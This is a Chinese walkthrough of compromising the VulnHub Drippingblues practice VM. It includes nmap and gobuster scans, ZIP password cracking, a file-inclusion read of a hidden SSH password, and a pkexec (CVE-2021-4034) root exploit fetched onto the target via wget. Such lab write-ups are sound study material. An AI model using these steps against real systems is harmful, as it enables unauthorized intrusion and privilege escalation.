渗透学习第四天之drippingblues靶机复现
字数 1345 2025-08-19 12:42:24

Drippingblues靶机渗透测试详细教学文档

0x00 实验环境准备

0x01 信息收集阶段

1. 网络扫描

由于靶机IP未知,首先进行网段扫描:

nmap -sn 192.168.80.0/24

发现靶机IP为 192.168.80.130

2. 端口扫描

对靶机进行详细端口扫描:

nmap -sV -p- 192.168.80.130

扫描结果应显示:

  • 21/tcp: FTP服务
  • 22/tcp: SSH服务
  • 80/tcp: HTTP服务

3. 目录扫描

使用工具如dirb或gobuster进行web目录扫描:

gobuster dir -u http://192.168.80.130 -w /usr/share/wordlists/dirb/common.txt

发现以下关键路径:

  • /dripisreal.txt
  • /etc/dripispowerful.html
  • /robots.txt

0x02 渗透测试过程

1. Web应用分析

访问发现:

  • /dripisreal.txt: 包含长文本内容,可能是SSH密码提示
  • /etc/dripispowerful.html: 返回404错误
  • /robots.txt: 仅记录上述两个路径

2. FTP服务利用

端口扫描发现FTP服务(21端口)存在信息泄露,获取到FTP凭据:

ftp 192.168.80.130
# 使用泄露的凭据登录

在FTP服务器上发现一个ZIP压缩文件,下载到本地:

get filename.zip

3. ZIP密码破解

使用fcrackzip工具破解ZIP密码:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt filename.zip

破解得到密码: 072528035

解压ZIP文件:

unzip -P 072528035 filename.zip

解压后得到:

  • 一个txt文件,内容为"just focus on 'drip'"
  • 另一个加密的ZIP文件

4. Web应用漏洞利用

重新审视web应用,发现index.php可能存在文件包含漏洞:

尝试参数注入:

http://192.168.80.130/index.php?drip=/etc/dripispowerful.html

查看页面源码,发现隐藏的SSH密码。

5. SSH登录尝试

根据web页面内容,猜测可能的用户名:

  • travisscott
  • thugger

使用发现的密码尝试SSH登录:

ssh thugger@192.168.80.130
# 输入发现的密码

成功登录thugger账户。

6. 权限提升

6.1 初步信息收集

查看当前用户权限:

sudo -l

发现没有sudo权限。

查找用户目录内容:

ls -la
cat user.txt  # 获取用户flag

6.2 查找特权文件

查找具有root权限的文件:

find / -perm -4000 2>/dev/null

发现policykit-1可能存在漏洞。

6.3 漏洞利用

靶机存在以下漏洞:

  • CVE-2021-4034
  • CVE-2021-3560

检查Python环境:

python3 --version

从GitHub下载CVE-2021-4034的Python exploit,传输到靶机:

# 在攻击机
python3 -m http.server 8000
# 在靶机
wget http://192.168.80.128:8000/exploit.py

执行exploit:

python3 exploit.py

成功获取root权限。

7. 获取root flag

cd /root
cat root.txt

0x03 技术要点总结

  1. 信息收集:全面的端口扫描和目录扫描是渗透测试的基础
  2. 凭证破解:使用fcrackzip等工具进行密码破解
  3. 文件包含漏洞:通过参数注入访问受限文件
  4. 权限提升
    • 识别具有root权限的可执行文件
    • 利用已知CVE漏洞(Polkit提权漏洞)
  5. 环境适配:当gcc不可用时,选择Python版本的exploit

0x04 参考资源

  1. CVE-2021-4034漏洞详情
  2. Polkit提权漏洞利用方法
  3. Fcrackzip使用指南
Drippingblues靶机渗透测试详细教学文档 0x00 实验环境准备 攻击机 : Kali Linux (IP: 192.168.80.128) 靶机 : Drippingblues (初始IP未知) 靶机下载地址 : https://download.vulnhub.com/drippingblues/drippingblues.ova 0x01 信息收集阶段 1. 网络扫描 由于靶机IP未知,首先进行网段扫描: 发现靶机IP为 192.168.80.130 2. 端口扫描 对靶机进行详细端口扫描: 扫描结果应显示: 21/tcp: FTP服务 22/tcp: SSH服务 80/tcp: HTTP服务 3. 目录扫描 使用工具如dirb或gobuster进行web目录扫描: 发现以下关键路径: /dripisreal.txt /etc/dripispowerful.html /robots.txt 0x02 渗透测试过程 1. Web应用分析 访问发现: /dripisreal.txt : 包含长文本内容,可能是SSH密码提示 /etc/dripispowerful.html : 返回404错误 /robots.txt : 仅记录上述两个路径 2. FTP服务利用 端口扫描发现FTP服务(21端口)存在信息泄露,获取到FTP凭据: 在FTP服务器上发现一个ZIP压缩文件,下载到本地: 3. ZIP密码破解 使用fcrackzip工具破解ZIP密码: 破解得到密码: 072528035 解压ZIP文件: 解压后得到: 一个txt文件,内容为"just focus on 'drip'" 另一个加密的ZIP文件 4. Web应用漏洞利用 重新审视web应用,发现 index.php 可能存在文件包含漏洞: 尝试参数注入: 查看页面源码,发现隐藏的SSH密码。 5. SSH登录尝试 根据web页面内容,猜测可能的用户名: travisscott thugger 使用发现的密码尝试SSH登录: 成功登录thugger账户。 6. 权限提升 6.1 初步信息收集 查看当前用户权限: 发现没有sudo权限。 查找用户目录内容: 6.2 查找特权文件 查找具有root权限的文件: 发现 policykit-1 可能存在漏洞。 6.3 漏洞利用 靶机存在以下漏洞: CVE-2021-4034 CVE-2021-3560 检查Python环境: 从GitHub下载CVE-2021-4034的Python exploit,传输到靶机: 执行exploit: 成功获取root权限。 7. 获取root flag 0x03 技术要点总结 信息收集 :全面的端口扫描和目录扫描是渗透测试的基础 凭证破解 :使用fcrackzip等工具进行密码破解 文件包含漏洞 :通过参数注入访问受限文件 权限提升 : 识别具有root权限的可执行文件 利用已知CVE漏洞(Polkit提权漏洞) 环境适配 :当gcc不可用时,选择Python版本的exploit 0x04 参考资源 CVE-2021-4034漏洞详情 Polkit提权漏洞利用方法 Fcrackzip使用指南